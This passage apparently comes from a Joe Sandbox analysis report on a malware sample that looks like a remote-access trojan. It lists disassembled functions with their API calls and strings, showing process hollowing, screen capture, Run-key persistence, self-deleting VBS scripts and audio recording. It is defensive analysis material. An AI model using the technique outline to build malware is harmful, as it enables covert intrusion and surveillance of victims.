                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                        • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                        • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                        • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                        Function 0044F723 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$InfoLocale_abort_free
                        • String ID:
                        • API String ID: 2692324296-0
                        • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                        • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                        • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                        • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                        Function 0044F216 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                        • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                        • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                        • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                        Function 004195F8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                        Download Yara Rule
                        APIs
                        • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                        • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                        • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                        • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                        Function 00445914 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                        • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalEnterEnumLocalesSectionSystem
                        • String ID:
                        • API String ID: 1272433827-0
                        • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                        • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                        • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                        • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                        Function 0044F130 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                        • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
                        • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                        • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
                        Function 0040E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                        Download Yara Rule
                        APIs
                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        • Opcode ID: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                        • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                        • Opcode Fuzzy Hash: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                        • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                        Function 004328FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                        • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                        • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                        • Instruction Fuzzy Hash:
                        Function 00416E7E Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                        • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                          • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                        • DeleteDC.GDI32(00000000), ref: 00416F32
                        • DeleteDC.GDI32(00000000), ref: 00416F35
                        • DeleteObject.GDI32(00000000), ref: 00416F38
                        • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                        • DeleteDC.GDI32(00000000), ref: 00416F6A
                        • DeleteDC.GDI32(00000000), ref: 00416F6D
                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                        • GetIconInfo.USER32(?,?), ref: 00416FC5
                        • DeleteObject.GDI32(?), ref: 00416FF4
                        • DeleteObject.GDI32(?), ref: 00417001
                        • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                        • DeleteDC.GDI32(?), ref: 0041713C
                        • DeleteDC.GDI32(00000000), ref: 0041713F
                        • DeleteObject.GDI32(00000000), ref: 00417142
                        • GlobalFree.KERNEL32(?), ref: 0041714D
                        • DeleteObject.GDI32(00000000), ref: 00417201
                        • GlobalFree.KERNEL32(?), ref: 00417208
                        • DeleteDC.GDI32(?), ref: 00417218
                        • DeleteDC.GDI32(00000000), ref: 00417223
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                        • String ID: DISPLAY
                        • API String ID: 479521175-865373369
                        • Opcode ID: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                        • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                        • Opcode Fuzzy Hash: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                        • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                        Function 0041642D Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                        • GetProcAddress.KERNEL32(00000000), ref: 00416477
                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                        • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                        • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                        • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                        • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                        • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                        • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                        • ResumeThread.KERNEL32(?), ref: 00416773
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                        • GetCurrentProcess.KERNEL32(?), ref: 00416795
                        • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                        • GetLastError.KERNEL32 ref: 004167B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                        • API String ID: 4188446516-3035715614
                        • Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                        • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                        • Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                        • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                        Function 0040BFDE Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 281registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                          • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                          • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                          • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                          • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                          • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                        • ExitProcess.KERNEL32 ref: 0040C389
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                        • API String ID: 1861856835-1953526029
                        • Opcode ID: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                        • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                        • Opcode Fuzzy Hash: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                        • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                        Function 00410EDA Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                        • ExitProcess.KERNEL32(00000000), ref: 00410F05
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                        • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                        • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                        • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                        • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                        • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                          • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                        • Sleep.KERNEL32(000001F4), ref: 004110E7
                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                        • CloseHandle.KERNEL32(00000000), ref: 0041110E
                        • GetCurrentProcessId.KERNEL32 ref: 00411114
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                        • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                        • API String ID: 2649220323-71629269
                        • Opcode ID: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                        • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                        • Opcode Fuzzy Hash: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                        • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                        Function 0040B871 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 296fileCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 0040B882
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                        • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                        • _wcslen.LIBCMT ref: 0040B968
                        • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                        • _wcslen.LIBCMT ref: 0040BA25
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                        • ExitProcess.KERNEL32 ref: 0040BC36
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                        • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                        • API String ID: 2743683619-2376316431
                        • Opcode ID: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                        • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                        • Opcode Fuzzy Hash: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                        • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                        Function 0040BC59 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 259registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                          • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                          • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                          • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                          • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                          • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                        • ExitProcess.KERNEL32 ref: 0040BFD7
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                        • API String ID: 3797177996-2974882535
                        • Opcode ID: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                        • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                        • Opcode Fuzzy Hash: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                        • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                        Function 00418FFD Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                        • SetEvent.KERNEL32 ref: 004191CF
                        • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                        • CloseHandle.KERNEL32 ref: 004191F0
                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                        • API String ID: 738084811-1354618412
                        • Opcode ID: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                        • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                        • Opcode Fuzzy Hash: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                        • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                        Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                        • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                        • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
